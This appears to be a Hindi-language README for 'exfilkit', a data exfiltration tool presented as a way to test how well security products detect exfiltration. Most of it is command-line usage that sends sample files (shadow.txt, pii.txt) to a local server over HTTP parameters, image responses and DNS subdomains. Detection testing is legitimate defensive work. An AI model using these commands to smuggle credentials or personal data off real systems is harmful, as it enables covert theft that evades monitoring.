
पहचान क्षमताओं के परीक्षण के लिए डेटा निकासी उपयोगिता
डेटा एक्सफिल्ट्रेशन उपयोगिता जो डिटेक्शन क्षमताओं का परीक्षण करने के लिए है
डेटा एक्सफिल्ट्रेशन उपयोगिता जो सुरक्षा उत्पादों की डिटेक्शन क्षमताओं का परीक्षण करने के लिए उपयोग की जाती है। स्पष्ट रूप से केवल कानूनी उद्देश्यों के लिए।
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r